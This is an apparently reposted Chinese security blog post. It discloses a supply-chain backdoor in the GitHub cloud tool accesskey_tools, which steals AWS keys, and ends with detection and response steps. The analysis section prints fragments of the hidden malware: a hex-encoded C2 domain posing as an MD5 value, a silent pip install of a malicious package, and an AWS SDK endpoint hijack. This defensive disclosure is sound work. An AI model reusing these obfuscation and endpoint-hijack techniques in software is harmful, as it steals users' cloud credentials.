文章总结： 文档披露GitHub上500+星标的云渗透工具accesskey_tools存在供应链投毒，其AWS模块通过三重混淆技术（伪装MD5的C2域名、静默安装恶意包、劫持AWSSDK端点）潜伏三年窃取用户AccessKey。核心危害包括凭证泄露、权限维持和数据风险，建议立即检查网络流量、卸载恶意包、吊销旧密钥并审计CloudTrail日志。 综合评分： 85 文章分类： 漏洞预警,供应链安全,云安全,恶意软件,实战经验

【惊天大瓜】500+ Star 云渗透神器竟是“三年老毒物”！你的 AWS 钥匙早就被黑客抄家了！

原创

老鑫安全 老鑫安全

老鑫安全

2026年6月11日 16:43 中国香港

在小说阅读器读本章

去阅读

注：本文图片来源于网络，如有问题，联系侵删。相关IoC（失陷指标）及技术细节参考自安全社区及供应链安全分析报告。

01. 事件背景

在网络安全领域，“信任”往往是最大的攻击面。近日，安全社区 t00ls 及多位研究员曝光了一起严重的供应链投毒事件。一款在 GitHub 上拥有 500+ Star、且在“某 buff”平台推广了近三年的云环境利用工具 —— accesskey_tools，被发现在其 AWS 模块中植入了后门。

该工具长期被红队、运维人员及云安全爱好者用于管理多云平台（AWS/Aliyun/Tencent）的 AccessKey。然而，攻击者利用三重混淆技术，在过去的三年中，持续窃取使用该工具用户的云凭证。

02. 影响范围

• • 项目地址：https://github.com/kohlersbtuh15/accesskey_tools
• • 受影响模块：AWS (Amazon Web Services) 全系列模块
• • 存活时间：据社区反馈，该后门已潜伏长达 3 年
• • 传播媒介：该工具不仅在 GitHub 上公开，还长期在国内某“buff”平台（类似知识付费或教程站）进行推广引流，影响面极广

在 GitHub 的 Issue 区，早已有愤怒的“受害者”留言质问（注：图片来源于网络），目前社区仍在激烈讨论中。

03. 技术深度分析：三重“完美”的欺骗逻辑

根据安全研究报告，攻击者并未直接在主脚本中写死发送密码的代码，而是通过极其隐蔽的 “变量混淆+静默装包+SDK劫持” 手法完成了身份凭证的窃取。

第一层：伪装成 MD5 的 C2 域名

在 aws/aws_select_iam.py 文件中，攻击者定义了一个看似无害的变量：

iam_md5 = "16170692e616c6979756e2d73646b2d72657175657374732e78797a2f"

• • 欺骗性：变量名包含 md5，诱导审计者认为是哈希校验。
• • 真相：去掉开头的字符 1，剩下的十六进制字符串解码后指向了攻击者的 C2 服务器： api.aliyun-sdk-requests.xyz
• • 心机：域名包含 aliyun-sdk，伪装成阿里云官方域名，极具欺骗性。

第二层：静默安装恶意依赖包

aws_select_iam.py 脚本运行时，会检查是否安装了 enumerate_iam 包。若没有，它会静默执行 pip 安装：

subprocess.run([sys.executable, "-m", "pip", "install", "-qqq", "https://.../aws_enumerateiam-1.0.2-py3-none-any.whl"])

• • 静默开关：-qqq 参数让安装过程完全不输出日志。
• • 进程重启：os.execv 重启脚本，用户毫无感知。

第三层：AWS SDK 端点劫持

这才是最致命的一步。恶意包 enumerate_iam 结合 botocore 的组件定位器机制，重写了 AWS SDK 的请求端点：

component.register_component(name='AWS_ENDPOINT', component=恶意域名)

当用户输入 AccessKey 试图查询资源时，AWS 官方 SDK 并没有把请求发到 amazonaws.com，而是发到了攻击者的服务器 api.aliyun-sdk-requests.xyz 。 由于 AWS API 请求使用 SigV4 签名算法，Authorization 头部包含了完整的 AccessKey 和签名信息，攻击者可以直接从流量中提取用户的AK/SK。

04. 核心危害

• • 凭证窃取：直接获取云账号的永久密钥（AccessKey/SecretKey）。
• • 权限维持：攻击者可利用窃取的凭证登录控制台，创建隐藏的高权限后门。
• • 横向移动：窃取凭证后，攻击者在内网或云上环境中进行横向渗透。
• • 数据泄露：如果受害者拥有 S3 或 RDS 权限，核心业务数据将被窃取。

05. 自查与应急响应

1. 如何判断是否中招？

• • 检查网络流量：检查服务器或本地是否有发往 aliyun-sdk-requests.xyz 或 api.aliyun-sdk-requests.xyz 的 DNS 解析请求 。
• • 检查 Python 包：执行 pip list | grep enumerate，查看是否存在 enumerate-iam 包，且来源并非官方 andresriancho。
• • 查看历史命令：检查是否曾下载或运行过该 accesskey_tools 项目。

2. 立即处置

如果你曾使用过该工具进行 AWS 操作：

1. 1. 立即吊销旧密钥：登录 AWS IAM 控制台，删除或禁用 使用过的 AccessKey。不要犹豫，立刻换新！
2. 2. 检查 CloudTrail 日志：审计最近 90 天内的 API 调用记录，特别是 GetObject（S3）、RunInstances（EC2）等敏感操作，查看是否有异常 IP 访问记录 。
3. 3. 检查IAM角色：查看是否有未授权的角色创建或策略附加。
4. 4. 清除恶意软件：删除 accesskey_tools 目录，卸载 enumerate-iam 恶意包。

06. 总结与反思

这件事再次印证了 “星多不一定安全” 。一款 500+ Star 的工具，其维护者竟然可以潜伏三年之久。对于安全从业者来说，任何未经审计的第三方云利用工具，都可能是别人为你准备的“蜜罐”。

请大家务必奔走相告，提醒身边的云上运维人员及同事，尽快进行自查，你的服务器可能早已是别人的“肉鸡”。

参考链接： *OSV漏洞库 MAL-2025-191686 * t00ls社区讨论及GitHub Issues *供应链投毒分析报告 *

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：老鑫安全 老鑫安全 老鑫安全《【惊天大瓜】500+ Star 云渗透神器竟是“三年老毒物”！你的 AWS 钥匙早就被黑客抄家了！》